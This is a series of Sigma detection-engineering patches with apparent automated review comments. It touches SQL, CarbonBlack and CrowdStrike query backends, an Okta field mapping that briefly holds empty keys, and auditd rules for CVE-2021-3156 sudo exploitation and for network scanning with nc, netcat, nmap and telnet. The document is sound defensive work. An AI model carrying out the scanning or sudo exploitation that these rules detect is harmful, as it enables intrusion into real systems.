selection_enabled = False + + + def __init__(self, sigmaconfig, options): + super().__init__(sigmaconfig) + + if "table" in options: + self.table = options["table"] + else: + self.table = "eventlog" + + if "select" in options and options["select"]: + self.select_fields = options["select"].split(',') + else: + self.select_fields = list() + + if "selection" in options: + self.selection_enabled = True + + def generateANDNode(self, node): + generated = [ self.generateNode(val) for val in node ] + filtered = [ g for g in generated if g is not None ] + if filtered: + return self.andToken.join(filtered) + else: + return None + + def generateORNode(self, node): + generated = [ self.generateNode(val) for val in node ] + filtered = [ g for g in generated if g is not None ] + if filtered: + return self.orToken.join(filtered) + else: + return None + + def generateNOTNode(self, node): + generated = self.generateNode(node.item) + if generated is not None: + return self.notToken + generated + else: + return None + + def 
generateSubexpressionNode(self, node): + generated = self.generateNode(node.items) + if generated: + return self.subExpression % generated + else: + return None + + def generateListNode(self, node): + if not set([type(value) for value in node]).issubset({str, int}): + raise TypeError("List values must be strings or numbers") + return self.listExpression % (self.listSeparator.join([self.generateNode(value) for value in node])) + + def generateMapItemNode(self, node): + fieldname, value = node + transformed_fieldname = self.fieldNameMapping(fieldname, value) + + has_wildcard = re.search(r"((\\(\*|\?|\\))|\*|\?|_|%)", self.generateNode(value)) + + if "," in self.generateNode(value) and not has_wildcard: + return self.mapMulti % (transformed_fieldname, self.generateNode(value)) + elif "LENGTH" in transformed_fieldname: + return self.mapLength % (transformed_fieldname, value) + elif type(value) == list: + return self.generateMapItemListNode(transformed_fieldname, value) + elif self.mapListsSpecialHandling == False and type(value) in (str, int, list) or self.mapListsSpecialHandling == True and type(value) in (str, int): + if has_wildcard: + return self.mapWildcard % (transformed_fieldname, self.generateNode(value)) + else: + return self.mapExpression % (transformed_fieldname, self.generateNode(value)) + elif "sourcetype" in transformed_fieldname: + return self.mapSource % (transformed_fieldname, self.generateNode(value)) + elif has_wildcard: + return self.mapWildcard % (transformed_fieldname, self.generateNode(value)) + else: + raise TypeError("Backend does not support map values of type " + str(type(value))) + + def generateMapItemListNode(self, key, value): + return "(" + (" OR ".join([self.mapWildcard % (key, self.generateValueNode(item)) for item in value])) + ")" + + def generateValueNode(self, node): + return self.valueExpression % (self.cleanValue(str(node))) + + def generateNULLValueNode(self, node): + return self.nullExpression % (node.item) + + def 
generateNotNULLValueNode(self, node): + return self.notNullExpression % (node.item) + + def fieldNameMapping(self, fieldname, value): + """ + Alter field names depending on the value(s). Backends may use this method to perform a final transformation of the field name + in addition to the field mapping defined in the conversion configuration. The field name passed to this method was already + transformed from the original name given in the Sigma rule. + """ + return fieldname + + def generate(self, sigmaparser): + """Method is called for each sigma rule and receives the parsed rule (SigmaParser)""" + fields = list() + + # First add fields specified in the rule + try: + for field in sigmaparser.parsedyaml["fields"]: + mapped = sigmaparser.config.get_fieldmapping(field).resolve_fieldname(field, sigmaparser) + if type(mapped) == str: + fields.append(mapped) + elif type(mapped) == list: + fields.extend(mapped) + else: + raise TypeError("Field mapping must return string or list") + + except KeyError: # no 'fields' attribute + pass + + # Then add fields specified in the backend configuration + fields.extend(self.select_fields) + + # In case select is specified in backend option, we want to enable selection + if len(self.select_fields) > 0: + self.selection_enabled = True + + # Finally, in case fields is empty, add the default value + if not fields: + fields = list("*") + + for parsed in sigmaparser.condparsed: + if self.selection_enabled: + query = self._generateQueryWithFields(parsed, fields) + else: + query = self.generateQuery(parsed) + before = self.generateBefore(parsed) + after = self.generateAfter(parsed) + + result = "" + if before is not None: + result = before + if query is not None: + result += query + if after is not None: + result += after + + return result + + def cleanValue(self, val): + if not isinstance(val, str): + return str(val) + + #Single backlashes which are not in front of * or ? are doulbed + val = re.sub(r"(? 
full text search + #False: no subexpression found, where a full text search is needed + + def _evaluateCondition(condition): + #Helper function to evaluate conditions + if type(condition) not in [ConditionAND, ConditionOR, ConditionNOT]: + raise NotImplementedError("Error in recursive Search logic") + + results = [] + for elem in condition.items: + if isinstance(elem, NodeSubexpression): + results.append(self._recursiveFtsSearch(elem)) + if isinstance(elem, ConditionNOT): + results.append(_evaluateCondition(elem)) + if isinstance(elem, tuple): + results.append(False) + if type(elem) in (str, int, list): + return True + return any(results) + + if type(subexpression) in [str, int, list]: + return True + elif type(subexpression) in [tuple]: + return False + + if not isinstance(subexpression, NodeSubexpression): + raise NotImplementedError("Error in recursive Search logic") + + if isinstance(subexpression.items, NodeSubexpression): + return self._recursiveFtsSearch(subexpression.items) + elif type(subexpression.items) in [ConditionAND, ConditionOR, ConditionNOT]: + return _evaluateCondition(subexpression.items) diff --git a/tools/sigma/backends/carbonblack.py b/tools/sigma/backends/carbonblack.py index cf517577..20325e6e 100644 --- a/tools/sigma/backends/carbonblack.py +++ b/tools/sigma/backends/carbonblack.py @@ -157,6 +157,7 @@ class CarbonBlackQueryBackend(CarbonBlackWildcardHandlingMixin, SingleTextQueryB def generateMapItemNode(self, node): fieldname, value = node + value = str(value) if fieldname == "EventID" and (type(value) is str or type(value) is int): fieldname = self.generateEventKey(value) value = self.generateEventValue(value) diff --git a/tools/sigma/backends/splunk.py b/tools/sigma/backends/splunk.py index c2bfb96b..ca294f5c 100644 --- a/tools/sigma/backends/splunk.py +++ b/tools/sigma/backends/splunk.py 
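Review bot: `nullExpression = "-%s=*"` and `notNullExpression = "%s=*"` look like Splunk search syntax rather than SQL, so `generateNULLValueNode` and `generateNotNULLValueNode` emit text Athena will reject; for this backend they should be `"%s IS NULL"` and `"%s IS NOT NULL"` (the same goes for `mapSource = "%s=%s"`). In `generateMapItemNode` the `"," in self.generateNode(value)` test runs before the `type(value) == list` check, so a plain string value containing a comma is rendered through `mapMulti` as `field IN 'a, b'` instead of an equality; checking for `list` first, or restricting the IN branch to list values, fixes that. The visible part of `cleanValue` doubles backslashes and handles wildcards but does not show single quotes being escaped, while `valueExpression` wraps every value in `'...'`, so a rule value containing `'` would break the generated statement unless the quote is doubled; the middle of this hunk is truncated on the page, so that may already be handled further down. The has_wildcard pattern also treats `_` and `%` as wildcards, so a literal underscore in a value (common in field values) switches the expression to `LIKE` unless cleanValue escapes it.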
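Review bot: `value = str(value)` coerces every map value before the EventID check, so `type(value) is int` on the next line can no longer be true, and a list value arriving here (the athena backend added in this same patch checks `type(value) == list` in its `generateMapItemNode`, so lists do reach this method) becomes its Python repr such as `"['a', 'b']"` rather than a set of alternatives. If the intent is only to make integer EventIDs comparable, narrow the coercion to `if isinstance(value, int): value = str(value)`. The rest of generateMapItemNode lies outside the hunk.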
@@ -178,7 +178,7 @@ class CrowdStrikeBackend(SplunkBackend):
 def generate(self, sigmaparser):
 lgs = sigmaparser.parsedyaml.get("logsource")
- if lgs.get("product") == "windows" and (lgs.get("service") == "sysmon" or lgs.get("category") == "process_creation"):
+ if lgs.get("product") == "windows" and (lgs.get("service") == "sysmon" or lgs.get("category") == "process_creation" or lgs.get("service") == "security"):
 fieldmappings = sigmaparser.config.fieldmappings
 detections = sigmaparser.definitions
 all_fields = dict()
@@ -210,4 +210,4 @@ class CrowdStrikeBackend(SplunkBackend):
 raise NotImplementedError("Not supported logsources!")
 def generateMapItemTypedNode(self, fieldname, value):
- return super().generateMapItemTypedNode(fieldname=fieldname, value=value)
\ No newline at end of file
+ return super().generateMapItemTypedNode(fieldname=fieldname, value=value)
From 87affad990af47750f23c65fd395158522aa2ce7 Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Mon, 13 Sep 2021 21:31:25 -0500
Subject: [PATCH 0937/1367] Create ecs-okta.yml
---
 tools/config/ecs-okta.yml | 47 +++++++++++++++++++++++++++++++++++++++
 1 file changed, 47 insertions(+)
 create mode 100644 tools/config/ecs-okta.yml
diff --git a/tools/config/ecs-okta.yml b/tools/config/ecs-okta.yml
new file mode 100644
index 00000000..beae8617
--- /dev/null
+++ b/tools/config/ecs-okta.yml
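Review bot: The extended condition now calls `lgs.get("service")` twice and has three alternatives chained with `or`; `lgs.get("service") in ("sysmon", "security") or lgs.get("category") == "process_creation"` reads more clearly and makes the next log source a one-token addition. `lgs` comes from `parsedyaml.get("logsource")` and would be None for a rule without a logsource block, but that predates this change. The body of generate continues past the hunk.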
@@ -0,0 +1,47 @@ +title: Elastic Common Schema And Elastic Exported Fields Mapping For Okta logs +order: 20 +backends: + - es-qs + - es-dsl + - es-rule + - kibana + - kibana-ndjson + - xpack-watcher + - elastalert + - elastalert-dsl +fieldmappings: + ClientIp: okta.client.ip + UserAgentRawUserAgent: okta.client.user_agent.raw_user_agent + UserAgentOs: okta.client.user_agent.os + UserAgentBrowser: okta.client.user_agent.browser + ClientZone: okta.client.zone + ClientDevice: okta.client.device + ClientId: okta.client.id + OutcomeReason: okta.outcome.reason + OutcomeResult: okta.event.outcome + Target: okta.target + TransactionId: okta.transaction.id + TransactionType: okta.transaction.type + DeviceFingerprint: okta.debug_context.debug_data.device_fingerprint + RequestId: okta.debug_context.debug_data.request_id + RequestUri: okta.debug_context.debug_data.request_uri + ThreatSuspected: okta.debug_context.debug_data.threat_suspected + Url: okta.debug_context.debug_data.url + SuspiciousActivityBrowser: okta.debug_context.debug_data.suspicious_activity.browser + SuspiciousActivityEventCity : okta.debug_context.debug_data.suspicious_activity.event_city + SuspiciousActivityEventCountry : okta.debug_context.debug_data.suspicious_activity.event_country + SuspiciousActivityEventId : okta.debug_context.debug_data.suspicious_activity.event_id + SuspiciousActivityEventIp : okta.debug_context.debug_data.suspicious_activity.event_ip + SuspiciousActivityEventLatitude : okta.debug_context.debug_data.suspicious_activity.event_latitude + SuspiciousActivityEventLongitude : okta.debug_context.debug_data.suspicious_activity.event_longitude + SuspiciousActivityEventState : okta.debug_context.debug_data.suspicious_activity.event_state + SuspiciousActivityEventTransactionId : okta.debug_context.debug_data.suspicious_activity.event_transaction_id + SuspiciousActivityEventType : okta.debug_context.debug_data.suspicious_activity.event_type + SuspiciousActivityEventOs : 
okta.debug_context.debug_data.suspicious_activity.os + SuspiciousActivityEventTimestamp : okta.debug_context.debug_data.suspicious_activity.timestamp + AuthenticationProvider: okta.authentication_context.authentication_provider + AuthenticationCredentialProvider: okta.authentication_context.credential_provider + AuthenticationCredentialType: okta.authentication_context.credential_type + AuthenticationIssuer: okta.authentication_context.issuer + AuthenticationExternalSessionID: okta.authentication_context.external_session_id + AuthenticationInterface: okta.authentication_context.interface From 94e47dcbb36d4af95419050ae1ffcdaac70268e4 Mon Sep 17 00:00:00 2001 From: Mark McCurdy Date: Mon, 13 Sep 2021 21:34:52 -0500 Subject: [PATCH 0938/1367] removing duplicate mappings due to yamllint --- tools/config/crowdstrike.yml | 3 --- 1 file changed, 3 deletions(-) diff --git a/tools/config/crowdstrike.yml b/tools/config/crowdstrike.yml index f1eb5593..28c1b8af 100644 --- a/tools/config/crowdstrike.yml +++ b/tools/config/crowdstrike.yml @@ -19,8 +19,6 @@ fieldmappings: cmdline: Commandline Image: ImageFileName TargetFilename: TargetFilename - TaskName: TaskName - Image: ImageFileName image: ImageFileName image_path: ImageFileName OriginalFileName: ImageFileName @@ -30,4 +28,3 @@ fieldmappings: ParentImage: ParentBaseFileName parent_image: ParentBaseFileName ServiceName: ServiceName - TargetFilename: TargetFileName From 15bd61ed9f9460e486222e4a4673ec02055d81de Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 13 Sep 2021 21:45:14 -0500 Subject: [PATCH 0939/1367] Update ecs-okta.yml --- tools/config/ecs-okta.yml | 88 +++++++++++++++++++++++---------------- 1 file changed, 53 insertions(+), 35 deletions(-) diff --git a/tools/config/ecs-okta.yml b/tools/config/ecs-okta.yml index beae8617..60a526b0 100644 --- a/tools/config/ecs-okta.yml +++ b/tools/config/ecs-okta.yml 
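Review bot: In the crowdstrike.yml hunk the de-duplication keeps `TargetFilename: TargetFilename` and drops `TargetFilename: TargetFileName`; the two target values differ only in the case of "File"/"file", and if the backend's field names are case-sensitive only one of them exists in the event schema, so the retained spelling should be verified against the CrowdStrike fields before merging. `TaskName: TaskName` and `Image: ImageFileName` now survive once each, which is what the yamllint duplicate-key check required.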
@@ -10,38 +10,56 @@ backends: - elastalert - elastalert-dsl fieldmappings: - ClientIp: okta.client.ip - UserAgentRawUserAgent: okta.client.user_agent.raw_user_agent - UserAgentOs: okta.client.user_agent.os - UserAgentBrowser: okta.client.user_agent.browser - ClientZone: okta.client.zone - ClientDevice: okta.client.device - ClientId: okta.client.id - OutcomeReason: okta.outcome.reason - OutcomeResult: okta.event.outcome - Target: okta.target - TransactionId: okta.transaction.id - TransactionType: okta.transaction.type - DeviceFingerprint: okta.debug_context.debug_data.device_fingerprint - RequestId: okta.debug_context.debug_data.request_id - RequestUri: okta.debug_context.debug_data.request_uri - ThreatSuspected: okta.debug_context.debug_data.threat_suspected - Url: okta.debug_context.debug_data.url - SuspiciousActivityBrowser: okta.debug_context.debug_data.suspicious_activity.browser - SuspiciousActivityEventCity : okta.debug_context.debug_data.suspicious_activity.event_city - SuspiciousActivityEventCountry : okta.debug_context.debug_data.suspicious_activity.event_country - SuspiciousActivityEventId : okta.debug_context.debug_data.suspicious_activity.event_id - SuspiciousActivityEventIp : okta.debug_context.debug_data.suspicious_activity.event_ip - SuspiciousActivityEventLatitude : okta.debug_context.debug_data.suspicious_activity.event_latitude - SuspiciousActivityEventLongitude : okta.debug_context.debug_data.suspicious_activity.event_longitude - SuspiciousActivityEventState : okta.debug_context.debug_data.suspicious_activity.event_state - SuspiciousActivityEventTransactionId : okta.debug_context.debug_data.suspicious_activity.event_transaction_id - SuspiciousActivityEventType : okta.debug_context.debug_data.suspicious_activity.event_type - SuspiciousActivityEventOs : okta.debug_context.debug_data.suspicious_activity.os - SuspiciousActivityEventTimestamp : okta.debug_context.debug_data.suspicious_activity.timestamp - AuthenticationProvider: 
okta.authentication_context.authentication_provider - AuthenticationCredentialProvider: okta.authentication_context.credential_provider - AuthenticationCredentialType: okta.authentication_context.credential_type - AuthenticationIssuer: okta.authentication_context.issuer - AuthenticationExternalSessionID: okta.authentication_context.external_session_id - AuthenticationInterface: okta.authentication_context.interface + : okta.actor.id + : okta.actor.type + : okta.actor.alternate_id + : okta.actor.display_name + : okta.client.ip + : okta.client.user_agent.raw_user_agent + : okta.client.user_agent.os + : okta.client.user_agent.browser + : okta.client.zone + : okta.client.device + : okta.client.id + : okta.outcome.reason + : event.outcome + : okta.target + : okta.transaction.id + : okta.transaction.type + : okta.debug_context.debug_data.device_fingerprint + : okta.debug_context.debug_data.request_id + : okta.debug_context.debug_data.request_uri + : okta.debug_context.debug_data.threat_suspected + : okta.debug_context.debug_data.url + : okta.debug_context.debug_data.suspicious_activity.browser + : okta.debug_context.debug_data.suspicious_activity.event_city + : okta.debug_context.debug_data.suspicious_activity.event_country + : okta.debug_context.debug_data.suspicious_activity.event_id + : okta.debug_context.debug_data.suspicious_activity.event_ip + : okta.debug_context.debug_data.suspicious_activity.event_latitude + : okta.debug_context.debug_data.suspicious_activity.event_longitude + : okta.debug_context.debug_data.suspicious_activity.event_state + : okta.debug_context.debug_data.suspicious_activity.event_transaction_id + : okta.debug_context.debug_data.suspicious_activity.event_type + : okta.debug_context.debug_data.suspicious_activity.os + : okta.debug_context.debug_data.suspicious_activity.timestamp + : okta.authentication_context.authentication_provider + : okta.authentication_context.authentication_step + : okta.authentication_context.credential_provider + : 
okta.authentication_context.credential_type + : okta.authentication_context.issuer + : okta.authentication_context.external_session_id + : okta.authentication_context.interface + : okta.security_context.as.number + : okta.security_context.as.organization.name + : okta.security_context.isp + : okta.security_context.domain + : okta.security_context.is_proxy + : okta.request.ip_chain.ip + : okta.request.ip_chain.version + : okta.request.ip_chain.source + : okta.request.ip_chain.geographical_context.city + : okta.request.ip_chain.geographical_context.state + : okta.request.ip_chain.geographical_context.postal_code + : okta.request.ip_chain.geographical_context.country + : okta.request.ip_chain.geographical_context.geolocation From 18959065805ec3265c2542b6e51e2a47f04b9372 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 13 Sep 2021 22:16:43 -0500 Subject: [PATCH 0940/1367] Update ecs-okta.yml --- tools/config/ecs-okta.yml | 40 +++++++++++++++++++++------------------ 1 file changed, 22 insertions(+), 18 deletions(-) diff --git a/tools/config/ecs-okta.yml b/tools/config/ecs-okta.yml index 60a526b0..c08d7015 100644 --- a/tools/config/ecs-okta.yml +++ b/tools/config/ecs-okta.yml 
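Review bot: Every one of the 53 added mappings has an empty key (`: okta.actor.id`, `: okta.client.ip`, …), so after this commit the file no longer maps any Sigma field name; depending on the loader that is either a parse error or 53 entries under the same null key of which only the last survives. If these are placeholders until the ECS names are decided, they should stay out of the committed config, because this file is selected by `backends:` for every Elastic backend listed above it and was working before. `: event.outcome` also drops the `okta.` prefix that every other value in the block carries, which looks unintended.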
@@ -10,20 +10,24 @@ backends: - elastalert - elastalert-dsl fieldmappings: - : okta.actor.id - : okta.actor.type - : okta.actor.alternate_id - : okta.actor.display_name - : okta.client.ip - : okta.client.user_agent.raw_user_agent - : okta.client.user_agent.os - : okta.client.user_agent.browser - : okta.client.zone - : okta.client.device - : okta.client.id - : okta.outcome.reason - : event.outcome - : okta.target + client.user.id: okta.actor.id + source.user.id: okta.actor.id + User: okta.actor.type + alternateId: okta.actor.alternate_id + client.user.full_name: okta.actor.display_name + source.user.full_name: okta.actor.display_name + related.user: okta.actor.display_name + client.ip: okta.client.ip + source.ip: okta.client.ip + user_agent.original: okta.client.user_agent.raw_user_agent + userAgent.os: okta.client.user_agent.os + userAgent.browser: okta.client.user_agent.browser + client.zone: okta.client.zone + client.device: okta.client.device + client.id: okta.client.id + event.action: okta.event_type + outcome.reason: okta.outcome.reason + event.outcome: okta.event.outcome : okta.transaction.id : okta.transaction.type : okta.debug_context.debug_data.device_fingerprint @@ -50,10 +54,10 @@ fieldmappings: : okta.authentication_context.issuer : okta.authentication_context.external_session_id : okta.authentication_context.interface - : okta.security_context.as.number - : okta.security_context.as.organization.name - : okta.security_context.isp - : okta.security_context.domain + client.as.number: okta.security_context.as.number + client.as.organization.name: okta.security_context.as.organization.name + client.domain: okta.security_context.isp + source.domain: okta.security_context.domain : okta.security_context.is_proxy : okta.request.ip_chain.ip : okta.request.ip_chain.version From 2a52cef62ec5a9cff7f979ebbc8e80d6c93e4cf0 Mon Sep 17 00:00:00 2001 
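Review bot: `client.domain: okta.security_context.isp` in the second hunk maps a domain field to the ISP value while the neighbouring `source.domain` maps to `okta.security_context.domain`; this looks like a copy slip and should presumably be `client.domain: okta.security_context.domain`, with the ISP value given its own key if it is needed at all. In the first hunk `User: okta.actor.type` pairs a user-name field with the actor type (user vs. client) rather than an identity, while `alternateId`, `client.user.id` and `client.user.full_name` already cover the identity fields; confirm what `User` is meant to resolve to. The `: okta.transaction.id`-style entries left in place still have empty keys and only disappear in the following commit.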
From: Austin Songer Date: Mon, 13 Sep 2021 22:29:19 -0500 Subject: [PATCH 0941/1367] Update ecs-okta.yml --- tools/config/ecs-okta.yml | 35 ----------------------------------- 1 file changed, 35 deletions(-) diff --git a/tools/config/ecs-okta.yml b/tools/config/ecs-okta.yml index c08d7015..a4ac6009 100644 --- a/tools/config/ecs-okta.yml +++ b/tools/config/ecs-okta.yml 
@@ -28,42 +28,7 @@ fieldmappings: event.action: okta.event_type outcome.reason: okta.outcome.reason event.outcome: okta.event.outcome - : okta.transaction.id - : okta.transaction.type - : okta.debug_context.debug_data.device_fingerprint - : okta.debug_context.debug_data.request_id - : okta.debug_context.debug_data.request_uri - : okta.debug_context.debug_data.threat_suspected - : okta.debug_context.debug_data.url - : okta.debug_context.debug_data.suspicious_activity.browser - : okta.debug_context.debug_data.suspicious_activity.event_city - : okta.debug_context.debug_data.suspicious_activity.event_country - : okta.debug_context.debug_data.suspicious_activity.event_id - : okta.debug_context.debug_data.suspicious_activity.event_ip - : okta.debug_context.debug_data.suspicious_activity.event_latitude - : okta.debug_context.debug_data.suspicious_activity.event_longitude - : okta.debug_context.debug_data.suspicious_activity.event_state - : okta.debug_context.debug_data.suspicious_activity.event_transaction_id - : okta.debug_context.debug_data.suspicious_activity.event_type - : okta.debug_context.debug_data.suspicious_activity.os - : okta.debug_context.debug_data.suspicious_activity.timestamp - : okta.authentication_context.authentication_provider - : okta.authentication_context.authentication_step - : okta.authentication_context.credential_provider - : okta.authentication_context.credential_type - : okta.authentication_context.issuer - : okta.authentication_context.external_session_id - : okta.authentication_context.interface client.as.number: okta.security_context.as.number client.as.organization.name: okta.security_context.as.organization.name client.domain: okta.security_context.isp source.domain: okta.security_context.domain - : okta.security_context.is_proxy - : okta.request.ip_chain.ip - : okta.request.ip_chain.version - : okta.request.ip_chain.source - : okta.request.ip_chain.geographical_context.city - : okta.request.ip_chain.geographical_context.state - : 
okta.request.ip_chain.geographical_context.postal_code - : okta.request.ip_chain.geographical_context.country - : okta.request.ip_chain.geographical_context.geolocation From 7ff0ff104ae2ee98459bc81ec5d2e33918d899b6 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Tue, 14 Sep 2021 01:52:03 -0500 Subject: [PATCH 0942/1367] Update ecs-okta.yml --- tools/config/ecs-okta.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/config/ecs-okta.yml b/tools/config/ecs-okta.yml index a4ac6009..0a8baefd 100644 --- a/tools/config/ecs-okta.yml +++ b/tools/config/ecs-okta.yml @@ -1,4 +1,4 @@ -title: Elastic Common Schema And Elastic Exported Fields Mapping For Okta logs +title: Elastic Exported Fields Mapping For Okta logs order: 20 backends: - es-qs From 1e4484bffb44505a3c797f0a328a889d7051e373 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 14 Sep 2021 19:22:56 +0200 Subject: [PATCH 0943/1367] split lnx_auditd_cve_2021_3156_sudo_buffer_overflow --- ...itd_cve_2021_3156_sudo_buffer_overflow.yml | 17 +++-------- ...21_3156_sudo_buffer_overflow_brutforce.yml | 29 +++++++++++++++++++ 2 files changed, 33 insertions(+), 13 deletions(-) create mode 100644 rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml diff --git a/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml b/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml index 737df5c2..7ff4fa3f 100644 --- a/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml +++ b/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml @@ -1,5 +1,5 @@ -action: global title: CVE-2021-3156 Exploitation Attempt +id: 5ee37487-4eb8-4ac2-9be1-d7d14cdc559f status: experimental description: Detects exploitation attempt of vulnerability described in CVE-2021-3156. | Alternative approach might be to look for flooding of auditd logs due to bruteforcing | 
@@ -10,17 +10,12 @@ references: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-3156 - https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit - https://nvd.nist.gov/vuln/detail/cve-2021-3156 -falsepositives: - - Unknown -level: critical tags: - attack.privilege_escalation - attack.t1068 logsource: product: linux service: auditd ---- -id: 5ee37487-4eb8-4ac2-9be1-d7d14cdc559f detection: selection: type: 'EXECVE' @@ -42,10 +37,6 @@ detection: cmd8: a4: '\' condition: selection and (cmd1 or cmd2 or cmd3 or cmd4) and (cmd5 or cmd6 or cmd7 or cmd8) | count() by host > 50 ---- -id: b9748c98-9ea7-4fdb-80b6-29bed6ba71d2 -detection: - selection: - type: 'SYSCALL' - exe: '/usr/bin/sudoedit' - condition: selection | count() by host > 50 +falsepositives: + - Unknown +level: critical \ No newline at end of file diff --git a/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml b/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml new file mode 100644 index 00000000..865377cc --- /dev/null +++ b/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml 
@@ -0,0 +1,29 @@ +title: CVE-2021-3156 Exploitation Attempt +id: b9748c98-9ea7-4fdb-80b6-29bed6ba71d2 +related: + - id: 5ee37487-4eb8-4ac2-9be1-d7d14cdc559f + type: derived +status: experimental +description: Detects exploitation attempt of vulnerability described in CVE-2021-3156. | + Alternative approach might be to look for flooding of auditd logs due to bruteforcing | + required to trigger the heap-based buffer overflow. +author: Bhabesh Raj +date: 2021/02/01 +references: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-3156 + - https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit + - https://nvd.nist.gov/vuln/detail/cve-2021-3156 +tags: + - attack.privilege_escalation + - attack.t1068 +logsource: + product: linux + service: auditd +detection: + selection: + type: 'SYSCALL' + exe: '/usr/bin/sudoedit' + condition: selection | count() by host > 50 +falsepositives: + - Unknown +level: critical \ No newline at end of file From 30955c488410410021565b498c20368c5cce4b27 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 14 Sep 2021 19:24:11 +0200 Subject: [PATCH 0944/1367] split global lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml --- .../auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml | 1 + .../lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml | 1 + 2 files changed, 2 insertions(+) diff --git a/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml b/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml index 7ff4fa3f..6c49477f 100644 --- a/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml +++ b/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml 
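Review bot: The `description` of the new rule is copied verbatim from the parent, so it still calls the auditd-flooding heuristic an "alternative approach" even though that is exactly what `condition: selection | count() by host > 50` implements; give each of the two files a description that states which signal it looks for. The aggregation also has no `timeframe`, so "more than 50 sudoedit SYSCALL events per host" is unbounded in time and each backend will either reject it or pick its own window; add `timeframe: 1m` or whatever window the original author intended. Both files in this commit end with `\ No newline at end of file`, as do the rules split in the following commits, and only three of those get the trailing newline restored later in this series; the file name's `brutforce` is presumably `bruteforce`.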
@@ -6,6 +6,7 @@ description: Detects exploitation attempt of vulnerability described in CVE-2021 required to trigger the heap-based buffer overflow. author: Bhabesh Raj date: 2021/02/01 +modified: 2021/09/14 references: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-3156 - https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit diff --git a/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml b/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml index 865377cc..7780da68 100644 --- a/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml +++ b/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml @@ -9,6 +9,7 @@ description: Detects exploitation attempt of vulnerability described in CVE-2021 required to trigger the heap-based buffer overflow. author: Bhabesh Raj date: 2021/02/01 +modified: 2021/09/14 references: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-3156 - https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit From bc69900335fdbb0f9d1aa86d3a25a9aa4eb630f1 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 14 Sep 2021 19:27:28 +0200 Subject: [PATCH 0945/1367] split global lnx_network_service_scanning.yml --- .../lnx_auditd_network_service_scanning.yml | 31 +++++++++++++++++++ rules/linux/lnx_network_service_scanning.yml | 27 +++------------- 2 files changed, 36 insertions(+), 22 deletions(-) create mode 100644 rules/linux/auditd/lnx_auditd_network_service_scanning.yml diff --git a/rules/linux/auditd/lnx_auditd_network_service_scanning.yml b/rules/linux/auditd/lnx_auditd_network_service_scanning.yml new file mode 100644 index 00000000..59aab8c6 --- /dev/null +++ b/rules/linux/auditd/lnx_auditd_network_service_scanning.yml 
@@ -0,0 +1,31 @@ +title: Linux Network Service Scanning +id: 3761e026-f259-44e6-8826-719ed8079408 +related: + - id: 3e102cd9-a70d-4a7a-9508-403963092f31 + type: derived +status: experimental +description: Detects enumeration of local or remote network services. +author: Alejandro Ortuno, oscd.community +date: 2020/10/21 +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md +tags: + - attack.discovery + - attack.t1046 +logsource: + product: linux + service: auditd + definition: 'Configure these rules https://github.com/Neo23x0/auditd/blob/master/audit.rules#L182-L183' +detection: + selection: + type: 'SYSCALL' + exe|endswith: + - '/telnet' + - '/nmap' + - '/netcat' + - '/nc' + key: 'network_connect_4' + condition: selection +falsepositives: + - Legitimate administration activities +level: low \ No newline at end of file diff --git a/rules/linux/lnx_network_service_scanning.yml b/rules/linux/lnx_network_service_scanning.yml index ce6d798d..435b641c 100644 --- a/rules/linux/lnx_network_service_scanning.yml +++ b/rules/linux/lnx_network_service_scanning.yml @@ -1,19 +1,15 @@ -action: global title: Linux Network Service Scanning +id: 3e102cd9-a70d-4a7a-9508-403963092f31 status: experimental description: Detects enumeration of local or remote network services. author: Alejandro Ortuno, oscd.community date: 2020/10/21 +modified: 2021/09/14 references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md -falsepositives: - - Legitimate administration activities -level: low tags: - attack.discovery - attack.t1046 ---- -id: 3e102cd9-a70d-4a7a-9508-403963092f31 logsource: category: process_creation product: linux 
